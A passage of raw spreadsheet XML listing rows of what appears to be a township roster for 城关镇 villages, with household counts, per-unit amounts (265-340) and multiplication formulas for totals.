      <c r="K114" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="115" ht="23" customHeight="1" spans="1:11">
      <c r="A115" s="13" t="s">
        <v>528</v>
      </c>
      <c r="B115" s="14" t="str">
        <f>B114</f>
        <v>城关镇</v>
      </c>
      <c r="C115" s="14" t="str">
        <f>C114</f>
        <v>中华村</v>
      </c>
      <c r="D115" s="13" t="s">
        <v>529</v>
      </c>
      <c r="E115" s="13" t="s">
        <v>312</v>
      </c>
      <c r="F115" s="14" t="str">
        <f>F114</f>
        <v>4113210108</v>
      </c>
      <c r="G115" s="14"/>
      <c r="H115" s="14"/>
      <c r="I115" s="14"/>
      <c r="J115" s="14"/>
      <c r="K115" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="116" ht="23" customHeight="1" spans="1:11">
      <c r="A116" s="13" t="s">
        <v>530</v>
      </c>
      <c r="B116" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C116" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D116" s="14" t="s">
        <v>531</v>
      </c>
      <c r="E116" s="14" t="s">
        <v>532</v>
      </c>
      <c r="F116" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G116" s="14">
        <v>1</v>
      </c>
      <c r="H116" s="14">
        <v>340</v>
      </c>
      <c r="I116" s="14">
        <f>H116*G116</f>
        <v>340</v>
      </c>
      <c r="J116" s="14" t="s">
        <v>533</v>
      </c>
      <c r="K116" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="117" ht="23" customHeight="1" spans="1:11">
      <c r="A117" s="13" t="s">
        <v>534</v>
      </c>
      <c r="B117" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C117" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D117" s="14" t="s">
        <v>535</v>
      </c>
      <c r="E117" s="14" t="s">
        <v>331</v>
      </c>
      <c r="F117" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G117" s="14">
        <v>2</v>
      </c>
      <c r="H117" s="14">
        <v>300</v>
      </c>
      <c r="I117" s="14">
        <f>H117*G117</f>
        <v>600</v>
      </c>
      <c r="J117" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K117" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="118" ht="23" customHeight="1" spans="1:11">
      <c r="A118" s="13" t="s">
        <v>536</v>
      </c>
      <c r="B118" s="14" t="str">
        <f>B117</f>
        <v>城关镇</v>
      </c>
      <c r="C118" s="14" t="str">
        <f>C117</f>
        <v>中华村</v>
      </c>
      <c r="D118" s="13" t="s">
        <v>537</v>
      </c>
      <c r="E118" s="13" t="s">
        <v>249</v>
      </c>
      <c r="F118" s="14" t="str">
        <f>F117</f>
        <v>4113210108</v>
      </c>
      <c r="G118" s="14"/>
      <c r="H118" s="14"/>
      <c r="I118" s="14"/>
      <c r="J118" s="14"/>
      <c r="K118" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="119" ht="23" customHeight="1" spans="1:11">
      <c r="A119" s="13" t="s">
        <v>538</v>
      </c>
      <c r="B119" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C119" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D119" s="14" t="s">
        <v>539</v>
      </c>
      <c r="E119" s="14" t="s">
        <v>258</v>
      </c>
      <c r="F119" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G119" s="14">
        <v>2</v>
      </c>
      <c r="H119" s="14">
        <v>300</v>
      </c>
      <c r="I119" s="14">
        <f>H119*G119</f>
        <v>600</v>
      </c>
      <c r="J119" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K119" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="120" ht="23" customHeight="1" spans="1:11">
      <c r="A120" s="13" t="s">
        <v>540</v>
      </c>
      <c r="B120" s="14" t="str">
        <f>B119</f>
        <v>城关镇</v>
      </c>
      <c r="C120" s="14" t="str">
        <f>C119</f>
        <v>西北村</v>
      </c>
      <c r="D120" s="13" t="s">
        <v>541</v>
      </c>
      <c r="E120" s="13" t="s">
        <v>303</v>
      </c>
      <c r="F120" s="14" t="str">
        <f>F119</f>
        <v>4113210106</v>
      </c>
      <c r="G120" s="14"/>
      <c r="H120" s="14"/>
      <c r="I120" s="14"/>
      <c r="J120" s="14"/>
      <c r="K120" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="121" ht="23" customHeight="1" spans="1:11">
      <c r="A121" s="13" t="s">
        <v>542</v>
      </c>
      <c r="B121" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C121" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D121" s="14" t="s">
        <v>543</v>
      </c>
      <c r="E121" s="14" t="s">
        <v>292</v>
      </c>
      <c r="F121" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G121" s="14">
        <v>1</v>
      </c>
      <c r="H121" s="14">
        <v>340</v>
      </c>
      <c r="I121" s="14">
        <f>H121*G121</f>
        <v>340</v>
      </c>
      <c r="J121" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K121" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="122" ht="23" customHeight="1" spans="1:11">
      <c r="A122" s="13" t="s">
        <v>544</v>
      </c>
      <c r="B122" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C122" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D122" s="14" t="s">
        <v>545</v>
      </c>
      <c r="E122" s="14" t="s">
        <v>284</v>
      </c>
      <c r="F122" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G122" s="14">
        <v>3</v>
      </c>
      <c r="H122" s="14">
        <v>265</v>
      </c>
      <c r="I122" s="14">
        <f>H122*G122</f>
        <v>795</v>
      </c>
      <c r="J122" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K122" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="123" ht="23" customHeight="1" spans="1:11">
      <c r="A123" s="13" t="s">
        <v>546</v>
      </c>
      <c r="B123" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C123" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D123" s="13" t="s">
        <v>547</v>
      </c>
      <c r="E123" s="13" t="s">
        <v>548</v>
      </c>
      <c r="F123" s="14" t="str">
        <f>F122</f>
        <v>4113210106</v>
      </c>
      <c r="G123" s="14"/>
      <c r="H123" s="14"/>
      <c r="I123" s="14"/>
      <c r="J123" s="14"/>
      <c r="K123" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="124" ht="23" customHeight="1" spans="1:11">
      <c r="A124" s="13" t="s">
        <v>549</v>
      </c>
      <c r="B124" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C124" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D124" s="13" t="s">
        <v>550</v>
      </c>
      <c r="E124" s="13" t="s">
        <v>551</v>
      </c>
      <c r="F124" s="14" t="str">
        <f>F123</f>
        <v>4113210106</v>
      </c>
      <c r="G124" s="14"/>
      <c r="H124" s="14"/>
      <c r="I124" s="14"/>
      <c r="J124" s="14"/>
      <c r="K124" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="125" ht="23" customHeight="1" spans="1:11">
      <c r="A125" s="13" t="s">
        <v>552</v>
      </c>
      <c r="B125" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C125" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D125" s="14" t="s">
        <v>553</v>
      </c>
      <c r="E125" s="14" t="s">
        <v>405</v>
      </c>
      <c r="F125" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G125" s="14">
        <v>1</v>
      </c>
      <c r="H125" s="14">
        <v>340</v>
      </c>
      <c r="I125" s="14">
        <f t="shared" ref="I125:I130" si="4">H125*G125</f>
        <v>340</v>
      </c>
      <c r="J125" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K125" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="126" ht="23" customHeight="1" spans="1:11">
      <c r="A126" s="13" t="s">
        <v>554</v>
      </c>
      <c r="B126" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C126" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D126" s="14" t="s">
        <v>555</v>
      </c>
      <c r="E126" s="14" t="s">
        <v>548</v>
      </c>
      <c r="F126" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G126" s="14">
        <v>1</v>
      </c>
      <c r="H126" s="14">
        <v>340</v>
      </c>
      <c r="I126" s="14">
        <f t="shared" si="4"/>
        <v>340</v>
      </c>
      <c r="J126" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K126" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="127" ht="23" customHeight="1" spans="1:11">
      <c r="A127" s="13" t="s">
        <v>556</v>
      </c>
      <c r="B127" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C127" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D127" s="14" t="s">
        <v>557</v>
      </c>
      <c r="E127" s="14" t="s">
        <v>331</v>
      </c>
      <c r="F127" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G127" s="14">
        <v>1</v>
      </c>
      <c r="H127" s="14">
        <v>340</v>
      </c>
      <c r="I127" s="14">
        <f t="shared" si="4"/>
        <v>340</v>
      </c>
      <c r="J127" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K127" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="128" ht="23" customHeight="1" spans="1:11">
      <c r="A128" s="13" t="s">
        <v>558</v>
      </c>
      <c r="B128" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C128" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D128" s="14" t="s">
        <v>559</v>
      </c>
      <c r="E128" s="14" t="s">
        <v>560</v>
      </c>
      <c r="F128" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G128" s="14">
        <v>1</v>
      </c>
      <c r="H128" s="14">
        <v>340</v>
      </c>
      <c r="I128" s="14">
        <f t="shared" si="4"/>
        <v>340</v>
      </c>
      <c r="J128" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K128" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="129" ht="23" customHeight="1" spans="1:11">
      <c r="A129" s="13" t="s">
        <v>561</v>
      </c>
      <c r="B129" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C129" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D129" s="14" t="s">
        <v>562</v>
      </c>
      <c r="E129" s="14" t="s">
        <v>349</v>
      </c>
      <c r="F129" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G129" s="14">
        <v>1</v>
      </c>
      <c r="H129" s="14">
        <v>340</v>
      </c>
      <c r="I129" s="14">
        <f t="shared" si="4"/>
        <v>340</v>
      </c>
      <c r="J129" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K129" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="130" ht="23" customHeight="1" spans="1:11">
      <c r="A130" s="13" t="s">
        <v>563</v>
      </c>
      <c r="B130" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C130" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D130" s="14" t="s">
        <v>564</v>
      </c>
      <c r="E130" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F130" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G130" s="14">
        <v>2</v>
      </c>
      <c r="H130" s="14">
        <v>300</v>
      </c>
      <c r="I130" s="14">
        <f t="shared" si="4"/>
        <v>600</v>
      </c>
      <c r="J130" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K130" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="131" ht="23" customHeight="1" spans="1:11">
      <c r="A131" s="13" t="s">
        <v>565</v>
      </c>
      <c r="B131" s="14" t="str">
        <f>B130</f>
        <v>城关镇</v>
      </c>
      <c r="C131" s="14" t="str">
        <f>C130</f>
        <v>西北村</v>
      </c>
      <c r="D131" s="13" t="s">
        <v>566</v>
      </c>
      <c r="E131" s="13" t="s">
        <v>236</v>
      </c>
      <c r="F131" s="14" t="str">
        <f>F130</f>
        <v>4113210106</v>
      </c>
      <c r="G131" s="14"/>
      <c r="H131" s="14"/>
      <c r="I131" s="14"/>
      <c r="J131" s="14"/>
      <c r="K131" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="132" ht="23" customHeight="1" spans="1:11">
      <c r="A132" s="13" t="s">
        <v>567</v>
      </c>
      <c r="B132" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C132" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D132" s="14" t="s">
        <v>568</v>
      </c>
      <c r="E132" s="14" t="s">
        <v>569</v>
      </c>
      <c r="F132" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G132" s="14">
        <v>2</v>
      </c>
      <c r="H132" s="14">
        <v>300</v>
      </c>
      <c r="I132" s="14">
        <f>H132*G132</f>
        <v>600</v>
      </c>
      <c r="J132" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K132" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="133" ht="23" customHeight="1" spans="1:11">
      <c r="A133" s="13" t="s">
        <v>570</v>
      </c>
      <c r="B133" s="14" t="str">
        <f>B132</f>
        <v>城关镇</v>
      </c>
      <c r="C133" s="14" t="str">
        <f>C132</f>
        <v>西北村</v>
      </c>
      <c r="D133" s="13" t="s">
        <v>571</v>
      </c>
      <c r="E133" s="13" t="s">
        <v>320</v>
      </c>
      <c r="F133" s="14" t="str">
        <f>F132</f>
        <v>4113210106</v>
      </c>
      <c r="G133" s="14"/>
      <c r="H133" s="14"/>
      <c r="I133" s="14"/>
      <c r="J133" s="14"/>
      <c r="K133" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="134" ht="23" customHeight="1" spans="1:11">
      <c r="A134" s="13" t="s">
        <v>572</v>
      </c>
      <c r="B134" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C134" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D134" s="14" t="s">
        <v>573</v>
      </c>
      <c r="E134" s="14" t="s">
        <v>239</v>
      </c>
      <c r="F134" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G134" s="14">
        <v>1</v>
      </c>
      <c r="H134" s="14">
        <v>340</v>
      </c>
      <c r="I134" s="14">
        <f>H134*G134</f>
        <v>340</v>
      </c>
      <c r="J134" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K134" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="135" ht="23" customHeight="1" spans="1:11">
      <c r="A135" s="13" t="s">
        <v>574</v>
      </c>
      <c r="B135" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C135" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D135" s="14" t="s">
        <v>575</v>
      </c>
      <c r="E135" s="14" t="s">
        <v>484</v>
      </c>
      <c r="F135" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G135" s="14">
        <v>2</v>
      </c>
      <c r="H135" s="14">
        <v>300</v>
      </c>
      <c r="I135" s="14">
        <f>H135*G135</f>
        <v>600</v>
      </c>
      <c r="J135" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K135" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="136" ht="23" customHeight="1" spans="1:11">
      <c r="A136" s="13" t="s">
        <v>576</v>
      </c>
      <c r="B136" s="14" t="str">
        <f>B135</f>
        <v>城关镇</v>
      </c>
      <c r="C136" s="14" t="str">
        <f>C135</f>
        <v>北外村</v>
      </c>
      <c r="D136" s="13" t="s">
        <v>577</v>
      </c>
      <c r="E136" s="13" t="s">
        <v>273</v>
      </c>
      <c r="F136" s="14" t="str">
        <f>F135</f>
        <v>4113210102</v>
      </c>
      <c r="G136" s="14"/>
      <c r="H136" s="14"/>
      <c r="I136" s="14"/>
      <c r="J136" s="14"/>
      <c r="K136" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="137" ht="23" customHeight="1" spans="1:11">
      <c r="A137" s="13" t="s">
        <v>578</v>
      </c>
      <c r="B137" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C137" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D137" s="14" t="s">
        <v>579</v>
      </c>
      <c r="E137" s="14" t="s">
        <v>284</v>
      </c>
      <c r="F137" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G137" s="14">
        <v>2</v>
      </c>
      <c r="H137" s="14">
        <v>300</v>
      </c>
      <c r="I137" s="14">
        <f>H137*G137</f>
        <v>600</v>
      </c>
      <c r="J137" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K137" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="138" ht="23" customHeight="1" spans="1:11">
      <c r="A138" s="13" t="s">
        <v>580</v>
      </c>
      <c r="B138" s="14" t="str">
        <f>B137</f>
        <v>城关镇</v>
      </c>
      <c r="C138" s="14" t="str">
        <f>C137</f>
        <v>东北六组</v>
      </c>
      <c r="D138" s="13" t="s">
        <v>581</v>
      </c>
      <c r="E138" s="13" t="s">
        <v>320</v>
      </c>
      <c r="F138" s="14" t="str">
        <f>F137</f>
        <v>4113210103</v>
      </c>
      <c r="G138" s="14"/>
      <c r="H138" s="14"/>
      <c r="I138" s="14"/>
      <c r="J138" s="14"/>
      <c r="K138" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="139" ht="23" customHeight="1" spans="1:11">
      <c r="A139" s="13" t="s">
        <v>582</v>
      </c>
      <c r="B139" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C139" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D139" s="14" t="s">
        <v>583</v>
      </c>
      <c r="E139" s="14" t="s">
        <v>584</v>
      </c>
      <c r="F139" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G139" s="14">
        <v>1</v>
      </c>
      <c r="H139" s="14">
        <v>340</v>
      </c>
      <c r="I139" s="14">
        <f>H139*G139</f>
        <v>340</v>
      </c>
      <c r="J139" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K139" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="140" ht="23" customHeight="1" spans="1:11">
      <c r="A140" s="13" t="s">
        <v>585</v>
      </c>
      <c r="B140" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C140" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D140" s="14" t="s">
        <v>586</v>
      </c>
      <c r="E140" s="14" t="s">
        <v>587</v>
      </c>
      <c r="F140" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G140" s="14">
        <v>1</v>
      </c>
      <c r="H140" s="14">
        <v>340</v>
      </c>
      <c r="I140" s="14">
        <f>H140*G140</f>
        <v>340</v>
      </c>
      <c r="J140" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K140" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="141" ht="23" customHeight="1" spans="1:11">
      <c r="A141" s="13" t="s">
        <v>588</v>
      </c>
      <c r="B141" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C141" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D141" s="14" t="s">
        <v>589</v>
      </c>
      <c r="E141" s="14" t="s">
        <v>232</v>
      </c>
      <c r="F141" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G141" s="14">
        <v>1</v>
      </c>
      <c r="H141" s="14">
        <v>340</v>
      </c>
      <c r="I141" s="14">
        <f>H141*G141</f>
        <v>340</v>
      </c>
      <c r="J141" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K141" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="142" ht="23" customHeight="1" spans="1:11">
      <c r="A142" s="13" t="s">
        <v>590</v>
      </c>
      <c r="B142" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C142" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D142" s="14" t="s">
        <v>591</v>
      </c>
      <c r="E142" s="14" t="s">
        <v>592</v>
      </c>
      <c r="F142" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G142" s="14">
        <v>2</v>
      </c>
      <c r="H142" s="14">
        <v>300</v>
      </c>
      <c r="I142" s="14">
        <f>H142*G142</f>
        <v>600</v>
      </c>
      <c r="J142" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K142" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="143" ht="23" customHeight="1" spans="1:11">
      <c r="A143" s="13" t="s">
        <v>593</v>
      </c>
      <c r="B143" s="14" t="str">
        <f>B142</f>
        <v>城关镇</v>
      </c>
      <c r="C143" s="14" t="str">
        <f>C142</f>
        <v>西北村</v>
      </c>
      <c r="D143" s="13" t="s">
        <v>594</v>
      </c>
      <c r="E143" s="13" t="s">
        <v>419</v>
      </c>
      <c r="F143" s="14" t="str">
        <f>F142</f>
        <v>4113210106</v>
      </c>
      <c r="G143" s="14"/>
      <c r="H143" s="14"/>
      <c r="I143" s="14"/>
      <c r="J143" s="14"/>
      <c r="K143" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="144" ht="23" customHeight="1" spans="1:11">
      <c r="A144" s="13" t="s">
        <v>595</v>
      </c>
      <c r="B144" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C144" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D144" s="14" t="s">
        <v>596</v>
      </c>
      <c r="E144" s="14" t="s">
        <v>284</v>
      </c>
      <c r="F144" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G144" s="14">
        <v>1</v>
      </c>
      <c r="H144" s="14">
        <v>340</v>
      </c>
      <c r="I144" s="14">
        <f>H144*G144</f>
        <v>340</v>
      </c>
      <c r="J144" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K144" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="145" ht="23" customHeight="1" spans="1:11">
      <c r="A145" s="13" t="s">
        <v>597</v>
      </c>
      <c r="B145" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C145" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D145" s="14" t="s">
        <v>598</v>
      </c>
      <c r="E145" s="14" t="s">
        <v>599</v>
      </c>
      <c r="F145" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G145" s="14">
        <v>1</v>
      </c>
      <c r="H145" s="14">
        <v>340</v>
      </c>
      <c r="I145" s="14">
        <f>H145*G145</f>
        <v>340</v>
      </c>
      <c r="J145" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K145" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="146" ht="23" customHeight="1" spans="1:11">
      <c r="A146" s="13" t="s">
        <v>600</v>
      </c>
      <c r="B146" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C146" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D146" s="14" t="s">
        <v>601</v>
      </c>
      <c r="E146" s="14" t="s">
        <v>258</v>
      </c>
      <c r="F146" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G146" s="14">
        <v>1</v>
      </c>
      <c r="H146" s="14">
        <v>340</v>
      </c>
      <c r="I146" s="14">
        <f>H146*G146</f>
        <v>340</v>
      </c>
      <c r="J146" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K146" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="147" ht="23" customHeight="1" spans="1:11">
      <c r="A147" s="13" t="s">
        <v>602</v>
      </c>
      <c r="B147" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C147" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D147" s="14" t="s">
        <v>440</v>
      </c>
      <c r="E147" s="14" t="s">
        <v>502</v>
      </c>
      <c r="F147" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G147" s="14">
        <v>1</v>
      </c>
      <c r="H147" s="14">
        <v>340</v>
      </c>
      <c r="I147" s="14">
        <f>H147*G147</f>
        <v>340</v>
      </c>
      <c r="J147" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K147" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="148" ht="23" customHeight="1" spans="1:11">
      <c r="A148" s="13" t="s">
        <v>603</v>
      </c>
      <c r="B148" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C148" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D148" s="14" t="s">
        <v>604</v>
      </c>
      <c r="E148" s="14" t="s">
        <v>265</v>
      </c>
      <c r="F148" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G148" s="14">
        <v>2</v>
      </c>
      <c r="H148" s="14">
        <v>300</v>
      </c>
      <c r="I148" s="14">
        <f>H148*G148</f>
        <v>600</v>
      </c>
      <c r="J148" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K148" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="149" ht="23" customHeight="1" spans="1:11">
      <c r="A149" s="13" t="s">
        <v>605</v>
      </c>
      <c r="B149" s="14" t="str">
        <f>B148</f>
        <v>城关镇</v>
      </c>
      <c r="C149" s="14" t="str">
        <f>C148</f>
        <v>西北村</v>
      </c>
      <c r="D149" s="13" t="s">
        <v>606</v>
      </c>
      <c r="E149" s="13" t="s">
        <v>607</v>
      </c>
      <c r="F149" s="14" t="str">
        <f>F148</f>
        <v>4113210106</v>
      </c>
      <c r="G149" s="14"/>
      <c r="H149" s="14"/>
      <c r="I149" s="14"/>
      <c r="J149" s="14"/>
      <c r="K149" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="150" ht="23" customHeight="1" spans="1:11">
      <c r="A150" s="13" t="s">
        <v>608</v>
      </c>
      <c r="B150" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C150" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D150" s="14" t="s">
        <v>609</v>
      </c>
      <c r="E150" s="14" t="s">
        <v>222</v>
      </c>
      <c r="F150" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G150" s="14">
        <v>2</v>
      </c>
      <c r="H150" s="14">
        <v>300</v>
      </c>
      <c r="I150" s="14">
        <f>H150*G150</f>
        <v>600</v>
      </c>
      <c r="J150" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K150" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="151" ht="23" customHeight="1" spans="1:11">
      <c r="A151" s="13" t="s">
        <v>610</v>
      </c>
      <c r="B151" s="14" t="str">
        <f>B150</f>
        <v>城关镇</v>
      </c>
      <c r="C151" s="14" t="str">
        <f>C150</f>
        <v>中华村</v>
      </c>
      <c r="D151" s="13" t="s">
        <v>611</v>
      </c>
      <c r="E151" s="13" t="s">
        <v>587</v>
      </c>
      <c r="F151" s="14" t="str">
        <f>F150</f>
        <v>4113210108</v>
      </c>
      <c r="G151" s="14"/>
      <c r="H151" s="14"/>
      <c r="I151" s="14"/>
      <c r="J151" s="14"/>
      <c r="K151" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="152" ht="23" customHeight="1" spans="1:11">
      <c r="A152" s="13" t="s">
        <v>612</v>
      </c>
      <c r="B152" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C152" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D152" s="14" t="s">
        <v>613</v>
      </c>
      <c r="E152" s="14" t="s">
        <v>288</v>
      </c>
      <c r="F152" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G152" s="14">
        <v>1</v>
      </c>
      <c r="H152" s="14">
        <v>340</v>
      </c>
      <c r="I152" s="14">
        <f>H152*G152</f>
        <v>340</v>
      </c>
      <c r="J152" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K152" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="153" ht="23" customHeight="1" spans="1:11">
      <c r="A153" s="13" t="s">
        <v>614</v>
      </c>
      <c r="B153" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C153" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D153" s="14" t="s">
        <v>615</v>
      </c>
      <c r="E153" s="14" t="s">
        <v>616</v>
      </c>
      <c r="F153" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G153" s="14">
        <v>2</v>
      </c>
      <c r="H153" s="14">
        <v>300</v>
      </c>
      <c r="I153" s="14">
        <f>H153*G153</f>
        <v>600</v>
      </c>
      <c r="J153" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K153" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="154" ht="23" customHeight="1" spans="1:11">
      <c r="A154" s="13" t="s">
        <v>617</v>
      </c>
      <c r="B154" s="14" t="str">
        <f>B153</f>
        <v>城关镇</v>
      </c>
      <c r="C154" s="14" t="str">
        <f>C153</f>
        <v>西北村</v>
      </c>
      <c r="D154" s="13" t="s">
        <v>618</v>
      </c>
      <c r="E154" s="13" t="s">
        <v>405</v>
      </c>
      <c r="F154" s="14" t="str">
        <f>F153</f>
        <v>4113210106</v>
      </c>
      <c r="G154" s="14"/>
      <c r="H154" s="14"/>
      <c r="I154" s="14"/>
      <c r="J154" s="14"/>
      <c r="K154" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="155" ht="23" customHeight="1" spans="1:11">
      <c r="A155" s="13" t="s">
        <v>619</v>
      </c>
      <c r="B155" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C155" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D155" s="14" t="s">
        <v>620</v>
      </c>
      <c r="E155" s="14" t="s">
        <v>621</v>
      </c>
      <c r="F155" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G155" s="14">
        <v>2</v>
      </c>
      <c r="H155" s="14">
        <v>300</v>
      </c>
      <c r="I155" s="14">
        <f>H155*G155</f>
        <v>600</v>
      </c>
      <c r="J155" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K155" s="14" t="s">
        <v>225</v>
      </c>
    </row>
